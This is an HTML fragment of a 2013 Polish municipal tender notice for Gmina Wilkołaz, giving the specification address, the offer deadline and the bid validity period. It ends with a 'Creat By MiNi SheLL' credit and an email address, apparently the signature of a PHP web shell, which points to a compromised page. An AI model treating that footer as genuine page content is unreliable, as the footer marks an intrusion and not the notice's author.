<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lublin.pl/wilkołaz<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wilkołaz
Wilkołaz Pierwszy 9
                                                        23-212 Wilkołaz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.05.2013 godzina 10:00, miejsce: Urząd Gminy Wilkołaz
Wilkołaz Pierwszy 9
                                                        23-212 Wilkołaz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com